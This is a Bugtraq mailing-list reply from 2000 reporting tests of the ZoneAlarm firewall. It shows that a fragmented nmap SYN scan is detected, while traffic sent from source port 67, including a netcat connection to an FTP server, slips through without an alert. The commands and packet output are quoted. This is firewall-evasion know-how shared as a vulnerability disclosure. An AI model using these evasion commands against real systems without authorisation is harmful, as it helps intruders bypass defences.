[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Re: ZoneAlarm
From: Max Vision <vision () WHITEHATS ! COM>
Date: 2000-04-26 9:50:33
[Download RAW message or body]
On Mon, 24 Apr 2000, Alfred Huger wrote:
> >Additionally, using nmap's -f flag allows you to send traffic past
> >ZoneAlarm without any alerts.
>
> I set up a copy on a local machine here and while I found that source port
> scans from 67 slipped past the firewall -f seemed to be alerted on just
> fine. Can anyone else comment to this?
>
Hi Al,
I get the same results you did; ZoneAlarm 2.1.10 alerts on a fragmented
SYN scan, but does not make any noise when the source port is set to 67.
# nmap -sS -p 139 -v -f -P0 victim.example.com
Initiating SYN half-open stealth scan against victim.example.com
(23.23.23.23)
04/26-02:11:52.260668 attacker -> 23.23.23.23
TCP TTL:61 TOS:0x0 ID:15452 MF
Frag Offset: 0x0 Frag Size: 0x10
BC 49 00 8B 4D 4B C7 11 00 00 00 00 50 02 08 00 .I..MK......P...
04/26-02:11:52.260745 attacker -> 23.23.23.23
TCP TTL:61 TOS:0x0 ID:15452
Frag Offset: 0x2 Frag Size: 0x4
CA 49 00 00 .I..
ZoneAlarm reports
"The firewall has blocked Internet access to your computer (NetBIOS
Session) from attacker.example.com (TCP Port 3133)."
When I add the option for source port 67 (-g 67) ZoneAlarm does not alert
- however, the packets do not seem to be delivered either (no RST nor
SYN+ACK).
Now if you remove fragmentation from the picture, it looks like you can
use source porting (67 anyway) to circumvent the ZoneAlarm software.
# nc -p 67 victim.example.com 21
220 Serv-U FTP-Server v2.5e for WinSock ready...
quit
Without the bootp source port this connection is dropped and an alert is
generated.
Max
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic